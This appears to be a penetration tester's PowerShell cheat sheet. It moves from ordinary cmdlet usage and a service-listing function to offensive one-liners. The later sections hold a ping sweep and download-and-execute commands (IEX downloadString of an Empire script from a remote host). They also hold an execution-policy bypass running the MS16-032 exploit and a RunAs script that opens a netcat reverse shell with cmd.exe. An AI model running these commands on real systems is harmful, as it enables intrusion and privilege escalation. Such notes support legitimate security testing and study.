# Powershell

## Get Command

```
PS> Get-Command -Noun process
PS> Get-Command -Verb get
PS> Get-Command set*
PS> Get-Command *process
```

## Alias and Children

```
PS> Get-Alias ls
PS> Get-Alias -Definition Get-ChildItem
PS> Get-ChildItem HKLM:   ..Registry
PS> Get-ChildItem cert:   ..Cert Store
```

## Help

```
PS> Get-Help Get-ChildItem
PS> help Get-ChildItem
PS> help Get-ChildItem -detailed
PS> help Get-ChildItem -examples   #best stuff here
```

## Create/Delete

```
PS> echo hello > file1.txt
PS> echo hello > file2.txt
PS> echo hello > file3.txt
PS> Remove-Item *.txt -WhatIf   .. will show you but not delete !!!
```

## Shortcuts

```
PS> ls -recurse
PS> ls -rec
PS> ls -r
```

## Find the Fields related to the processes

```
e.g. Name, PID
PS> Get-Process | Get-Member
PS> ps | gm
PS> ps | format-list -property name, id, starttime
PS> ps | Format-Table
PS> ps | ft *    ..will try to jam everything into a table (ugly)
```

## ForEach Loops

```
# % is the alias for ForEach-Object; $_ is the current pipeline object

PS> ps -name nc | ForEach-Object {$_.Name}
PS> 100,200,500 | % {$_ * 5}

PS> ps -name nc | % {stop-process $_}
```

## Find Services

```
PS> Get-Service | Where-Object { $_.Status -eq "Running" } | Sort-Object -Property name -Descending

PS> Get-Service | fl *   #format list                     ..ugly!
PS> Get-Service | Select-Object servicename, displayname  ..much better
PS> Get-Service | Select servicename, displayname         ..much better!
PS> Get-Service | Select servicename, displayname | gm
```
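As an added example that is not part of the original notes, the same filter/select/sort pipeline can be combined with `Get-CimInstance Win32_Service` to show what `Get-Service` alone does not: the account each running service uses, its start mode and its binary path. It assumes Windows PowerShell 3+ (or PowerShell 7 on Windows); `Get-RunningServiceDetail` is a name chosen here.

```powershell
# Added example, not from the original cheat sheet.
# Joins Get-Service with Win32_Service so a service review shows account, start mode and path.
function Get-RunningServiceDetail {
    param(
        # Optional name filter, e.g. 'w*'; defaults to every service
        [string]$Name = '*'
    )

    # Win32_Service carries the fields Get-Service does not expose: StartName, StartMode, PathName
    $cim = @{}
    Get-CimInstance -ClassName Win32_Service | ForEach-Object { $cim[$_.Name] = $_ }

    Get-Service -Name $Name |
        Where-Object { $_.Status -eq 'Running' } |
        ForEach-Object {
            $info = $cim[$_.Name]
            [pscustomobject]@{
                Name        = $_.Name
                DisplayName = $_.DisplayName
                Account     = $info.StartName
                StartMode   = $info.StartMode
                Path        = $info.PathName
            }
        } |
        Sort-Object -Property Account, Name
}

# Same idiom as above: filter, select the columns you want, then format
Get-RunningServiceDetail | Select-Object Name, Account, StartMode, Path | Format-Table -AutoSize

# Narrow to services not running under one of the built-in service accounts
Get-RunningServiceDetail |
    Where-Object { $_.Account -notmatch '^(LocalSystem|NT AUTHORITY\\(LocalService|NetworkService))$' } |
    Format-List
```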

## Ping Sweeps

```
PS> 1..255 | % {echo "10.10.10.$_"; ping -n 1 -w 100 10.10.10.$_ | select-string ttl}
```

## Downloads

```
PS> cd .\Desktop\
PS> wget http://$IP:8000/launcher.bat -OutFile launcher.bat
PS> dir
PS> notepad ./launcher.bat
```

## Download and Execute

* REF: [TransferFiles](/06-linux-privesc/04-transfer-files.md)

```
python -m SimpleHTTPServer 8080

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.x.x.x:8080/empire.ps1')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
```

## One Liner to run from CMD

* MS16-032: https://www.exploit-db.com/exploits/39719/

```
> powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"
```

## Powershell RunAs

* PowerShell can also be used to launch a process as another user.
* The following simple script runs a reverse shell as the specified username and password (save it as `PowerShellRunAs.ps1`).

```
$username = '<username here>'
$password = '<password here>'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","$IP","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public
```

Run it from CMD:

```
> powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"
```

